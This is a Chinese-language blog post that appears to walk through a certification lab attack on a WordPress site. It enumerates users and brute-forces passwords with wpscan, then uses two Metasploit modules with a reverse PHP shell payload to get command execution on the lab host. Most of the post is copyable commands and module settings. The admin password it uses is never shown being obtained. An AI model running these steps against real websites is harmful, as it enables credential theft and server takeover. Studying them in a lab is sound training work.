WordPress 相關破解
WordPress 相關破解
因為要破解駭客友善部落格系統 WordPress,所以首先要確認目標網站是否 WordPress
透過工具 WhatWeb 進行目標網站掃描
指令 : whatweb http://10.10.10.16:8080/ceh
掃描後發現目標網站是採用 WordPress 4.9.15 建置
直接開始使用 WordPress 殺人放火好工具 wpscan 進行列舉與使用者列表
指令 : wpscan --url http://10.10.10.16:8080/ceh/ -e u
參數 -e 為列舉,參數 u 為使用者列表
三組使用者帳號列舉如下圖 admin / cehuser1 / cehuser2
後續直接透過同一個工具破解密碼
指令 : wpscan --url http://10.10.10.16/ceh/ -P /usr/share/worldlists/nmap.lst
順利破解其中一個使用者 cehuser1,密碼為 green
只要攻破 WordPress 網站後即可利用網頁漏洞專用工具 Metasploit 進行下一步攻擊
進入 msfconsole (每次啟動歡迎畫面都是隨機的喔)
接著可以使用 wp_admin_shell_upload 模組進行安裝後門,不過要先輸入目標參數
可以透過 show info 來查看要輸入的相關參數,可以看到基本的參數如下
set RHOST : 目標主機 IP or 名稱
set RPORT : 目標主機使用的 Port
set TARGETURI : 目標主機網址列使用的 URI
set USERNAME : 要使用的使用者帳號
set PASSWORD : 上述使用者的密碼
set PALOAD : 設定要使用的 payload 檔案名稱
我們一一輸入如下的參數值
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI /ceh
set USERNAME admin
set PASSWORD qwerty@123
set PAYLOAD php/reverse_php
接著輸入 exploit 就成功進入 WordPress 對方主機命令字元了
可以看到 whoami / hostname / net user 都直接列出來了
另外一個是透過 WordPress 安裝的外掛進行入侵
如下可以看到該 WordPress 有安裝 Photo Gallery 1.2.5 外掛套件
或是透過 wpscan 時亦可看到套件名稱與版本資訊如下
指令 : wpscan --url http://10.10.10.16:8080/ceh
進入 msfconsole 開始進行進階入侵 (這次的登入畫面是一個忍者)
這次要使用的外掛漏洞,模組的路徑如下
exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
指令 : use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload
一樣給予相關參數如下
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI /ceh
set USERNAME cehuser1
set PASSWORD green
set PAYLOAD php/reverse_php
進行 exploit,一樣又進入目標主機的 command line 了
whoami / hostname / net user 指令結果輸出如下
留言
張貼留言